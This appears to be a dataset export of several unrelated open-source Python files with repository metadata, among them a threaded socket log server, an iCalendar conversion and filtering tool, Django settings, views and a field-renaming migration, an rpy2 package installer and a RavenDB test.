LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
CSRF_COOKIE_SECURE = False
SESSION_COOKIE_SECURE = False
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
# Captcha
CAPTCHA_IMAGE_SIZE = (80, 28)
CAPTCHA_TIMEOUT = 1
| 24.91791
| 91
| 0.692123
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,133
| 0.638814
|
5581ae54a36323a4a46f3383645e34f4c26755e1
| 2,891
|
py
|
Python
|
bin/simple_log_server.py
|
kr0nt4b/ctrl_my_home
|
fd86b479d78f94aaa5d6cc92f0f49399aaef0733
|
[
"Apache-2.0"
] | null | null | null |
bin/simple_log_server.py
|
kr0nt4b/ctrl_my_home
|
fd86b479d78f94aaa5d6cc92f0f49399aaef0733
|
[
"Apache-2.0"
] | null | null | null |
bin/simple_log_server.py
|
kr0nt4b/ctrl_my_home
|
fd86b479d78f94aaa5d6cc92f0f49399aaef0733
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
"""
Simple socket server using threads
"""
import socket
import sys
from thread import *
import os
import logging
HOST = '' # Symbolic name meaning all available interfaces
PORT = 9998 # Arbitrary non-privileged port
LOG_FORMAT = '%(asctime)-15s %(message)s'
SMART_LOG = '/var/log/smart/smarthome.log'
def init_logging():
smart_log_path = os.path.dirname(SMART_LOG)
if not os.path.exists(os.path.dirname(smart_log_path)):
os.mkdir(smart_log_path)
logging.basicConfig(filename=SMART_LOG, level=logging.DEBUG, format=LOG_FORMAT)
return logging.getLogger('log_server')
class LogServer:
def __init__(self):
self.logger = init_logging()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.logger.info('Socket created')
# Bind socket to local host and port
try:
self.sock.bind((HOST, PORT))
except socket.error as msg:
self.logger.info('Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
sys.exit()
self.logger.info('Socket bind complete')
# Start listening on socket
self.sock.listen(10)
self.logger.info('Socket now listening')
# Function for handling connections. This will be used to create threads
def client_thread(self, connection):
# Sending message to connected client
connection.send('Welcome to the logserver') # send only takes string
# infinite loop so that function do not terminate and thread do not end.
while True:
# Receiving from client
data = connection.recv(1024)
reply = 'OK\n'
if not data:
break
tokens = data.split(' ')
if len(tokens) > 1:
level = data.split(' ')[1]
if level == 'DEBUG:':
self.logger.debug(data)
if level == 'INFO:':
self.logger.info(data)
if level == 'ERROR:':
self.logger.error(data)
else:
self.logger.info(data)
connection.sendall(reply)
# came out of loop
connection.close()
def start(self):
# now keep talking with the client
while True:
# wait to accept a connection - blocking call
conn, addr = self.sock.accept()
self.logger.info('Connected with ' + addr[0] + ':' + str(addr[1]))
# start new thread takes 1st argument as a function name to be run, second
# is the tuple of arguments to the function.
start_new_thread(self.client_thread, (conn,))
self.sock.close()
if __name__ == "__main__":
log_server = LogServer()
try:
log_server.start()
except KeyboardInterrupt as e:
print(e.message)
| 28.91
| 95
| 0.590107
| 2,113
| 0.730889
| 0
| 0
| 0
| 0
| 0
| 0
| 911
| 0.315116
|
5581eb881f3ca5ddfe7fd5be0a7447ea5b604281
| 1,348
|
py
|
Python
|
utils/calc_drh.py
|
leogoesger/func-flow
|
c81f73998df9b02c04c19a6beae463121d5a8898
|
[
"MIT"
] | 11
|
2018-04-14T00:34:34.000Z
|
2021-05-04T17:23:50.000Z
|
utils/calc_drh.py
|
Yesicaleon/func-flow
|
c81f73998df9b02c04c19a6beae463121d5a8898
|
[
"MIT"
] | 15
|
2019-04-02T03:35:22.000Z
|
2022-02-12T13:17:11.000Z
|
utils/calc_drh.py
|
Yesicaleon/func-flow
|
c81f73998df9b02c04c19a6beae463121d5a8898
|
[
"MIT"
] | 9
|
2018-12-01T19:46:11.000Z
|
2022-03-31T17:18:15.000Z
|
import numpy as np
from utils.helpers import *
percentiles = [10, 25, 50, 75, 90]
percentile_keys = ["ten", "twenty_five", "fifty", "seventy_five", "ninty"]
def calc_drh(flow_matrix):
"""Dimensionless Hydrograph Plotter"""
average_annual_flow = calculate_average_each_column(flow_matrix)
number_of_rows = len(flow_matrix)
number_of_columns = len(flow_matrix[0, :])
normalized_matrix = np.zeros((number_of_rows, number_of_columns))
"""Initiating the DRH object with desired keys"""
drh = {}
for index, percentile in enumerate(percentiles):
drh[percentile_keys[index]] = []
drh["min"] = []
drh["max"] = []
for row_index, _ in enumerate(flow_matrix[:, 0]):
for column_index, _ in enumerate(flow_matrix[row_index, :]):
normalized_matrix[row_index, column_index] = flow_matrix[row_index,
column_index]/average_annual_flow[column_index]
for index, percentile in enumerate(percentiles):
drh[percentile_keys[index]].append(round(np.nanpercentile(
normalized_matrix[row_index, :], percentile), 2))
drh["min"].append(round(np.nanmin(normalized_matrix[row_index, :]), 2))
drh["max"].append(round(np.nanmax(normalized_matrix[row_index, :]), 2))
return drh
| 39.647059
| 116
| 0.647626
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 153
| 0.113501
|
55837f3526a4635ce717d7aeac4df126359ab0fc
| 78
|
py
|
Python
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/nn.py
|
SauravMaheshkar/cookiecutter-kaggle-cv-starter
|
fb7b8b84daa039034d53398f64e5adfaeead6445
|
[
"MIT"
] | null | null | null |
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/nn.py
|
SauravMaheshkar/cookiecutter-kaggle-cv-starter
|
fb7b8b84daa039034d53398f64e5adfaeead6445
|
[
"MIT"
] | null | null | null |
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/nn.py
|
SauravMaheshkar/cookiecutter-kaggle-cv-starter
|
fb7b8b84daa039034d53398f64e5adfaeead6445
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
__all__ = ["Model"]
class Model(nn.Module):
pass
| 9.75
| 23
| 0.653846
| 32
| 0.410256
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.089744
|
5583a4b67ff425c68e23ee2615524b5aa7a257d1
| 591
|
py
|
Python
|
meiduo1/apps/meiduo_admin/views/user_group.py
|
woobrain/nginx-uwsgi-web
|
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
|
[
"MIT"
] | null | null | null |
meiduo1/apps/meiduo_admin/views/user_group.py
|
woobrain/nginx-uwsgi-web
|
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
|
[
"MIT"
] | 2
|
2021-05-28T19:45:17.000Z
|
2021-11-02T15:49:34.000Z
|
meiduo1/apps/meiduo_admin/views/user_group.py
|
woobrain/nginx-uwsgi-web
|
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.models import Group, Permission
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from .statistical import UserPagination
from apps.meiduo_admin.serializer.user_group import UserGroupSerializer, GroupPerSerializer
class UserGroupView(ModelViewSet):
serializer_class = UserGroupSerializer
queryset = Group.objects.all()
pagination_class = UserPagination
def simple(self,request):
data = Permission.objects.all()
ser = GroupPerSerializer(data,many=True)
return Response(ser.data)
| 32.833333
| 91
| 0.788494
| 306
| 0.517766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
558514d3c5a79e30120fc03aa990f786ff898ee6
| 355
|
py
|
Python
|
server/soman/announcements/urls.py
|
bilgorajskim/soman
|
0d65d632c39a72f51b43fae71f4b00efc7b286c1
|
[
"MIT"
] | null | null | null |
server/soman/announcements/urls.py
|
bilgorajskim/soman
|
0d65d632c39a72f51b43fae71f4b00efc7b286c1
|
[
"MIT"
] | null | null | null |
server/soman/announcements/urls.py
|
bilgorajskim/soman
|
0d65d632c39a72f51b43fae71f4b00efc7b286c1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets
from . import views
router = routers.DefaultRouter()
router.register(r'announcements', views.AnnouncementViewSet)
urlpatterns = [
url(r'^api/', include(router.urls))
]
| 27.307692
| 60
| 0.769014
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 47
| 0.132394
|
55860760bf8930847b1a7c03d8b03442f460fce6
| 414
|
py
|
Python
|
backend/app/db/__init__.py
|
MaxKochanov/stock-news
|
42776196604e91cd673c94c9f7dea71343791bd1
|
[
"MIT"
] | null | null | null |
backend/app/db/__init__.py
|
MaxKochanov/stock-news
|
42776196604e91cd673c94c9f7dea71343791bd1
|
[
"MIT"
] | null | null | null |
backend/app/db/__init__.py
|
MaxKochanov/stock-news
|
42776196604e91cd673c94c9f7dea71343791bd1
|
[
"MIT"
] | null | null | null |
from app.db.wrappers import ClickHouse
DBS = {}
async def init_databases(config):
"""
Usage example
DBS["clickhouse"] = await ClickHouse.init_async(config["clickhouse"])
DBS["mysql"] = await MySQL.init_async(config["mysql"])
"""
pass
async def shutdown_databases():
"""
await ClickHouse.close_async(DBS["clickhouse"])
await MySQL.close_async(DBS["mysql"])
"""
pass
| 19.714286
| 73
| 0.654589
| 0
| 0
| 0
| 0
| 0
| 0
| 359
| 0.86715
| 267
| 0.644928
|
5588a3d3733f037d283e357aa48613bd11e602e8
| 1,108
|
py
|
Python
|
ravendb/tests/jvm_migrated_tests/client/executor/test_request_executor.py
|
ravendb/RavenDB-Python-Client
|
6286b459b501e755fe8e8591a48acf8616605ccd
|
[
"MIT"
] | 8
|
2016-10-08T17:45:44.000Z
|
2018-05-29T12:16:43.000Z
|
ravendb/tests/jvm_migrated_tests/client/executor/test_request_executor.py
|
ravendb/RavenDB-Python-Client
|
6286b459b501e755fe8e8591a48acf8616605ccd
|
[
"MIT"
] | 5
|
2017-02-12T15:50:53.000Z
|
2017-09-18T12:25:01.000Z
|
ravendb/tests/jvm_migrated_tests/client/executor/test_request_executor.py
|
ravendb/RavenDB-Python-Client
|
6286b459b501e755fe8e8591a48acf8616605ccd
|
[
"MIT"
] | 8
|
2016-07-03T07:59:12.000Z
|
2017-09-18T11:22:23.000Z
|
from ravendb.documents.conventions.document_conventions import DocumentConventions
from ravendb.exceptions.exceptions import DatabaseDoesNotExistException
from ravendb.http.request_executor import RequestExecutor
from ravendb.http.server_node import ServerNode
from ravendb.http.topology import UpdateTopologyParameters
from ravendb.tests.test_base import TestBase
class TestRequestExecutor(TestBase):
def setUp(self):
super(TestRequestExecutor, self).setUp()
def test_throws_when_updating_topology_of_not_existing_db(self):
conventions = DocumentConventions()
with RequestExecutor.create(
self.store.urls, "no_such_db", conventions, None, None, self.store.thread_pool_executor
) as executor:
server_node = ServerNode(self.store.urls[0], "no_such")
update_topology_parameters = UpdateTopologyParameters(server_node)
update_topology_parameters.timeout_in_ms = 5000
with self.assertRaises(DatabaseDoesNotExistException):
executor.update_topology_async(update_topology_parameters).result()
| 44.32
| 99
| 0.773466
| 740
| 0.66787
| 0
| 0
| 0
| 0
| 0
| 0
| 21
| 0.018953
|
558930319f7b3b786028343bb2be22080c9650c4
| 14,091
|
py
|
Python
|
src/icaltool/icaltool.py
|
randomchars42/icaltool
|
acf482f08bb4eb7bc000c0b2591c6d76ec8fcaac
|
[
"Unlicense"
] | null | null | null |
src/icaltool/icaltool.py
|
randomchars42/icaltool
|
acf482f08bb4eb7bc000c0b2591c6d76ec8fcaac
|
[
"Unlicense"
] | null | null | null |
src/icaltool/icaltool.py
|
randomchars42/icaltool
|
acf482f08bb4eb7bc000c0b2591c6d76ec8fcaac
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python3
import csv
import logging
import logging.config
import re
import argparse
import json
import sys
from .log import log
from . import datatypes
logger = logging.getLogger(__name__)
default_column_mapping = {
'DTSTART': 0,
'DTEND': 1,
'DTSTAMP': 2,
'UID': 3,
'CREATED': 4,
'DESCRIPTION': 5,
'LAST-MODIFIED': 6,
'LOCATION': 7,
'SEQUENCE': 8,
'SUMMARY': 9,
'CATEGORIES': 10,
'CLASS': 11,
'ATTACH': 12,
'TRANSP': 13,
'RRULE': 14,
'EXDATE': 15,
'STATUS': 16
}
custom_column_names = {
'DTSTART': 'DTSTART',
'DTEND': 'DTEND',
'DTSTAMP': 'DTSTAMP',
'UID': 'UID',
'CREATED': 'CREATED',
'DESCRIPTION': 'DESCRIPTION',
'LAST-MODIFIED': 'LAST-MODIFIED',
'LOCATION': 'LOCATION',
'SEQUENCE': 'SEQUENCE',
'SUMMARY': 'SUMMARY',
'CATEGORIES': 'CATEGORIES',
'CLASS': 'CLASS',
'ATTACH': 'ATTACH',
'TRANSP': 'TRANSP',
'RRULE': 'RRULE',
'EXDATE': 'EXDATE',
'STATUS': 'STATUS'
}
standard_components = [
'VCALENDAR',
'STANDARD',
'DAYLIGHT',
'VEVENT',
'VTODO',
'VJOURNAL',
'VALARM',
'VFREEBUSY'
]
class ICalTool:
"""
Tool for handling calendar data (ical) as defined in:
RFC 2445 (https://datatracker.ietf.org/doc/html/rfc2445)
"""
def __init__(self):
self._reset()
def _reset(self):
self.vcalendar = None
def setup(self, options):
# currently only understands
# {
# "COMPONENTNAME": {
# "defined_properties": {
# "PROPERTY": [(-1|0|1), "NAMEOFCLASS"],
# }
# },
# ...
# }
for key, value in options.items():
if key in standard_components:
class_object = getattr(datatypes, key)
try:
for prop, values in value['defined_properties'].items():
if not len(values) == 2:
logger.warning('illegal value for property {} in ' +
'defined_properties'.format(prop))
continue
#setattr(class_object.defined_properties, prop, values)
class_object.defined_properties[prop] = values
except KeyError:
logger.warning('did not unterstand option "{}"'.format(
key))
def load(self, file_name, component='VEVENT',
has_header=True, custom_column_names=custom_column_names,
column_mapping=default_column_mapping,
delimiter=',', quotechar='"'):
if file_name[-3:] == 'csv':
self.csv_load(file_name, component, has_header, custom_column_names,
column_mapping, delimiter, quotechar)
elif file_name[-3:] == 'ics':
self.ical_load(file_name)
else:
logger.error('invalid file given ("{}")'.format(file_name))
sys.exit()
def csv_load(self, file_name, component='VEVENT',
has_header=True, custom_column_names=custom_column_names,
column_mapping=default_column_mapping,
delimiter=',', quotechar='"'):
with open(file_name, 'r', newline='', encoding='utf-8-sig') as \
file_handle:
logger.info('opening {}'.format(file_name))
data = csv.reader(
file_handle, delimiter=delimiter, quotechar=quotechar)
if has_header:
header = next(data)
column_mapping = self._csv_get_column_mapping(
default_column_mapping, has_header, header, custom_column_names)
self.vcalendar = datatypes.VCALENDAR()
self.vcalendar.csv_parse(component, data, column_mapping)
logger.info('loaded {}'.format(file_name))
def _csv_get_column_mapping(self, default_column_mapping, has_header,
header, custom_column_names):
if not has_header:
# no headers to parse
# so use default column mapping
return default_column_mapping
# get headers from file
column_mapping = {}
i = 0
for column in header:
column_mapping[column] = i
i = i + 1
if len(custom_column_names) == 0:
return parsed_columns
# the user provided costum columns names in a dictionary
new_mapping = {}
for column_name in column_mapping.keys():
# so go through every available column
try:
# 1. the parsed column name exists in the user
# provided dictionary
new_mapping[custom_column_names[column_name]] = \
column_mapping[column_name]
except KeyError:
# 2. the name cannot be translated so copy it
new_mapping[column_name] = \
column_mapping[column_name]
return new_mapping
def ical_load(self, file_name):
with open(file_name, 'r', newline='', encoding='utf-8-sig') as \
file_handle:
logger.info('opening {}'.format(file_name))
raw = file_handle.readlines()
lines = []
vcalendar = False
# clean up
for line in raw:
# remove the trailing "\n"
line = line.rstrip("\r\n")
# do not use empty lines
if not line == '':
if not vcalendar and line == 'BEGIN:VCALENDAR':
vcalendar = True
logger.debug('recording new VCALENDAR')
elif vcalendar:
if line == 'END:VCALENDAR':
vcalendar = False
logger.debug('finished recording VCALENDAR')
# unfold lines (folded lines begin with a single whitespace
# or tab)
elif line[0] == ' ' or line[0] == "\t":
# append to previous line
lines[len(lines) - 1] += line[1:]
else:
lines.append(line)
self.vcalendar = datatypes.VCALENDAR()
self.vcalendar.ical_parse(lines)
logger.info('loaded {}'.format(file_name))
def write(self, file_name, component):
if file_name[-3:] == 'csv':
self.csv_write(file_name, component)
elif file_name[-3:] == 'ics':
self.ical_write(file_name)
else:
logger.error('invalid file given ("{}")'.format(file_name))
sys.exit()
def csv_write(self, file_name, component='VEVENT'):
lines = []
# can only write components of one type
with open(file_name, 'w') as file_handle:
logger.info('writing to {}'.format(file_name))
# get a list of known properties to use as column names
class_object = getattr(datatypes, component)
properties = []
for prop, attributes in class_object.defined_properties.items():
if attributes[0] == 2:
continue
else:
properties.append(prop)
# build header
lines.append('"' + '","'.join(properties) + '"')
# fill with data
lines.extend(self.vcalendar.csv_write(component))
file_handle.write("\r\n".join(lines))
logger.info('finished writing to {}'.format(file_name))
def ical_write(self, file_name):
with open(file_name, 'w') as file_handle:
logger.info('writing to {}'.format(file_name))
lines = self.vcalendar.ical_write()
for line in lines:
text = ''
while True:
text += line[:74] + "\r\n"
line = ' ' + line[74:]
if line == ' ':
break
file_handle.write(text)
logger.info('finished writing to {}'.format(file_name))
def filter(self, rules):
if self.vcalendar is None:
logger.warning('cannot apply rules before calendar data has been '+
'loaded')
return
# example component rule:
# - keep only events:
# COMPONENT:+VEVENT
# - filter out all events:
# COMPONENT:-VEVENT
# - filter out all events and alarms
# COMPONENT:-VEVENT,VALARM
# example property rules:
# - filter out all components with a start date between 2015 and 2017:
# DTSTART:-2015to2017
# - keep only components with a start date between 2015-10 and 2017-11:
# DTSTART:+2015-10to2017-11
# - ... attended by john.doe@mail.domain:
# DTSTART:+2015-10to2017-11;ATTENDEE:+john.doe@mail.domain
# - ... but not by jane.doe@mail.domain:
# ...;ATTENDEE:+john.doe@mail.domain|-jane.doe@mail.domain
raw_rules = rules.split(';')
parsed_rules = {}
for raw_rule in raw_rules:
try:
name, rule = raw_rule.split(':')
except ValueError:
# no ':'
logger.warning('malformed rule {}'.format(raw_rule))
continue
logger.info('found rule for {}: "{}"'.format(name, rule))
parsed_rules[name] = rule.split('|')
try:
component_rule = parsed_rules['COMPONENT'][0]
logger.debug('found component rule: "{}"'.format(component_rule))
# sanity check
if not re.match('[+-]{1}[A-Z,]+', component_rule):
logger.error('component filter cannot have inclusion and ' +
'exclusion criteria, "{}" given'.format(component_rule))
return
components_keep = component_rule[0] == '+'
components = component_rule[1:].split(',')
del parsed_rules['COMPONENT']
except KeyError:
# no component rule
# create an empty list of components to remove
components = []
components_keep = False
self.vcalendar.filter(components, components_keep,
parsed_rules)
# taken from :
# https://stackoverflow.com/questions/9027028/argparse-argument-order
class CustomAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if not 'ordered_args' in namespace:
setattr(namespace, 'ordered_args', [])
previous = namespace.ordered_args
previous.append((self.dest, values))
setattr(namespace, 'ordered_args', previous)
def main():
# parse arguments
parser = argparse.ArgumentParser(
description='Tool to work with calendar data. It can read .ics ' +
'(preferred) and .csv files. You can filter the compontents ' +
'(events, todos, alarms, journals, freebusy-indicators) by their ' +
'type or the value of their properties, e.g. start date ' +
'(DTSTART) or organiser (ORGANIZER). The result can be written ' +
'back to a file, again either .ics (preferred) or .csv.',
epilog='')
parser.add_argument(
'file',
help='the file to load, either .csv or .ics (preferred)',
type=str)
parser.add_argument(
'-o',
'--output',
help='the file to write to, either .csv or .ics (preferred)',
type=str,
action=CustomAction)
parser.add_argument(
'-f',
'--filter',
help='rules to filter which component types (events, todos, alarms, ' +
'journals, freebusy-indicators) to keep / sort out',
type=str,
action=CustomAction)
parser.add_argument(
'-s',
'--setup',
help='json-string containing options, e.g. ' +
'{"VEVENT": {"defined_properties": ' +
'{"ATTENDEE": [-1, "Property"]}}} ' +
'to ignore the ATTENDEE property when parsing',
type=str)
parser.add_argument(
'-c',
'--component',
help='component type stored in the .csv-file (one of: events ' +
'[VEVENT], todos [VTODO], alarms [VALARM], journals [VJOURNAL], ' +
'freebusy-indicators [VFREEBUSY]); if no component is specified ' +
'events [VEVENT] are assumed to be the input / desired output',
type=str,
default='VEVENT')
parser.add_argument(
'-v',
'--verbosity',
action='count',
help='increase verbosity',
default=0)
args = parser.parse_args()
# setup logging
logging_config = log.config
if args.verbosity >= 3:
logging_config['handlers']['console']['level'] = 'DEBUG'
elif args.verbosity == 2:
logging_config['handlers']['console']['level'] = 'INFO'
elif args.verbosity == 1:
logging_config['handlers']['console']['level'] = 'WARNING'
else:
logging_config['handlers']['console']['level'] = 'ERROR'
logging.config.dictConfig(logging_config)
# setup ICalTool
tool = ICalTool()
if not args.setup is None:
tool.setup(json.loads(args.setup))
# load file
tool.load(args.file, component=args.component)
# do whatever
if not 'ordered_args' in args:
logger.error('nothing to do with the loaded data - exiting')
return
# process actions in order of flags
for arg, value in args.ordered_args:
if arg == 'output':
if value == args.file:
logger.error('please don\'t attempt to overwrite your input ' +
'file - while it is technically possible it seems unwise ' +
"\n cancelling")
continue
tool.write(value, component=args.component)
elif arg == 'filter':
tool.filter(value)
if __name__ == '__main__':
main()
| 33.630072
| 83
| 0.544461
| 9,545
| 0.677383
| 0
| 0
| 0
| 0
| 0
| 0
| 4,596
| 0.326166
|
55895bd32cc5eee1e655399e93c373ec1fa66d6b
| 1,462
|
py
|
Python
|
install_R_packages.py
|
mohaEs/PyVisualField
|
64c7303c77500c923300536dd717f2e6c0262323
|
[
"MIT"
] | null | null | null |
install_R_packages.py
|
mohaEs/PyVisualField
|
64c7303c77500c923300536dd717f2e6c0262323
|
[
"MIT"
] | null | null | null |
install_R_packages.py
|
mohaEs/PyVisualField
|
64c7303c77500c923300536dd717f2e6c0262323
|
[
"MIT"
] | 1
|
2022-01-04T19:33:06.000Z
|
2022-01-04T19:33:06.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 11 18:00:28 2021
@author: Mohammad Eslami
"""
try:
import rpy2
print('===> rpy2 version: ', rpy2.__version__)
from rpy2.robjects.packages import importr
# import rpy2's package module
import rpy2.robjects.packages as rpackages
# R vector of strings
from rpy2.robjects.vectors import StrVector
except:
print('===> Something is wrong: rpy2 is not available!')
# import R's "base" package
lib_base = importr('base')
# import R's "utils" package
lib_utils = importr('utils')
# select a mirror for R packages
lib_utils.chooseCRANmirror(ind=1) # select the first mirror in the list
# R package names
packnames = ('visualFields', 'vfprogression')
# Selectively install what needs to be install.
names_to_install = [x for x in packnames if not rpackages.isinstalled(x)]
if len(names_to_install) > 0:
lib_utils.install_packages(StrVector(names_to_install))
try:
lib_vf = importr('visualFields')
print('===> visualFields R package is installed/loaded successfully!')
lib_vfprogression = importr('vfprogression')
print('===> vfprogression R package is installed/loaded successfully!')
except:
print('===> Something is wrong: R packages are not available!')
# try:
# import PyVisualFields
# print('===> PyVisualFields package loaded successfully!')
# except:
# print('===> Something is wrong: PyVisualFields is not available!')
| 27.584906
| 75
| 0.699042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 832
| 0.569083
|
5589cd912e691b17322bc09642b9a8ec0453acc9
| 8,949
|
py
|
Python
|
usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py
|
toolness/usaspending-api
|
ed9a396e20a52749f01f43494763903cc371f9c2
|
[
"CC0-1.0"
] | 1
|
2021-06-17T05:09:00.000Z
|
2021-06-17T05:09:00.000Z
|
usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py
|
toolness/usaspending-api
|
ed9a396e20a52749f01f43494763903cc371f9c2
|
[
"CC0-1.0"
] | null | null | null |
usaspending_api/financial_activities/migrations/0005_auto_20161004_1547.py
|
toolness/usaspending-api
|
ed9a396e20a52749f01f43494763903cc371f9c2
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-04 19:47
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('financial_activities', '0004_merge_20160928_1603'),
]
operations = [
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='by_direct_reimbursable_fun',
new_name='by_direct_reimbursable_funding_source',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='deobligations_recov_by_pro_cpe',
new_name='deobligations_recoveries_refund_pri_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='drv_obli_inc_by_prog_obj_class',
new_name='drv_obligations_incurred_by_program_object_class',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='drv_obligations_undel_ord_unp',
new_name='drv_obligations_undelivered_orders_unpaid',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlay_amount_by_pro_cpe',
new_name='gross_outlay_amount_by_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlay_amount_by_pro_fyb',
new_name='gross_outlay_amount_by_program_object_class_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_delivered_or_cpe',
new_name='gross_outlays_delivered_orders_paid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_delivered_or_fyb',
new_name='gross_outlays_delivered_orders_paid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_undelivered_cpe',
new_name='gross_outlays_undelivered_orders_prepaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='gross_outlays_undelivered_fyb',
new_name='gross_outlays_undelivered_orders_prepaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_delivered_orde_cpe',
new_name='obligations_delivered_orders_unpaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_delivered_orde_fyb',
new_name='obligations_delivered_orders_unpaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_incurred_by_pr_cpe',
new_name='obligations_incurred_by_program_object_class_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_undelivered_or_cpe',
new_name='obligations_undelivered_orders_unpaid_total_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='obligations_undelivered_or_fyb',
new_name='obligations_undelivered_orders_unpaid_total_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480100_undelivered_or_cpe',
new_name='ussgl480100_undelivered_orders_obligations_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480100_undelivered_or_fyb',
new_name='ussgl480100_undelivered_orders_obligations_unpaid_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480200_undelivered_or_cpe',
new_name='ussgl480200_undelivered_orders_oblig_prepaid_advanced_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl480200_undelivered_or_fyb',
new_name='ussgl480200_undelivered_orders_oblig_prepaid_advanced_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl483100_undelivered_or_cpe',
new_name='ussgl483100_undelivered_orders_oblig_transferred_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl483200_undelivered_or_cpe',
new_name='ussgl483200_undeliv_orders_oblig_transferred_prepaid_adv_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl487100_downward_adjus_cpe',
new_name='ussgl487100_down_adj_pri_unpaid_undel_orders_oblig_recov_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl487200_downward_adjus_cpe',
new_name='ussgl487200_down_adj_pri_ppaid_undel_orders_oblig_refund_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl488100_upward_adjustm_cpe',
new_name='ussgl488100_upward_adjust_pri_undeliv_order_oblig_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl488200_upward_adjustm_cpe',
new_name='ussgl488200_up_adjust_pri_undeliv_order_oblig_ppaid_adv_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490100_delivered_orde_cpe',
new_name='ussgl490100_delivered_orders_obligations_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490100_delivered_orde_fyb',
new_name='ussgl490100_delivered_orders_obligations_unpaid_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490200_delivered_orde_cpe',
new_name='ussgl490200_delivered_orders_obligations_paid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490800_authority_outl_cpe',
new_name='ussgl490800_authority_outlayed_not_yet_disbursed_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl490800_authority_outl_fyb',
new_name='ussgl490800_authority_outlayed_not_yet_disbursed_fyb',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl493100_delivered_orde_cpe',
new_name='ussgl493100_delivered_orders_oblig_transferred_unpaid_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl497100_downward_adjus_cpe',
new_name='ussgl497100_down_adj_pri_unpaid_deliv_orders_oblig_recov_cpe',
),
migrations.RenameField(
model_name='financialaccountsbyprogramactivityobjectclass',
old_name='ussgl497200_downward_adjus_cpe',
